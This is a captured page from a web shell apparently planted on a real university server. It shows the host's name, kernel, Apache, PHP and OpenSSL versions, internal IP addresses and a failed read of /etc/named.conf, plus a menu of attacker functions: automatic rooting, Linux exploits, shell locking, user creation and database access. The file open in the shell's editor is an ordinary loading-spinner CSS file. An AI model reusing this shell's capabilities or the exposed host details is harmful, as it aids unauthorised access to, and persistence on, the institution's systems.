Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
animsition-master /
src /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
fade
[ DIR ]
drwxrwxr-x
flip
[ DIR ]
drwxrwxr-x
overlay
[ DIR ]
drwxrwxr-x
rotate
[ DIR ]
drwxrwxr-x
zoom
[ DIR ]
drwxrwxr-x
animsition.css
1.01
KB
-rwxrwxr-x
base.css
249
B
-rwxrwxr-x
loading.css
742
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : loading.css
/* loading option */ .animsition-loading, .animsition-loading:after { width: 32px; height: 32px; position: fixed; top: 50%; left: 50%; margin-top: -16px; margin-left: -16px; border-radius: 50%; z-index: 100; } .animsition-loading { background-color: transparent; border-top: 5px solid rgba(0, 0, 0, 0.2); border-right: 5px solid rgba(0, 0, 0, 0.2); border-bottom: 5px solid rgba(0, 0, 0, 0.2); border-left: 5px solid #eee; transform: translateZ(0); animation-iteration-count:infinite; animation-timing-function: linear; animation-duration: .8s; animation-name: animsition-loading; } @keyframes animsition-loading { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
Close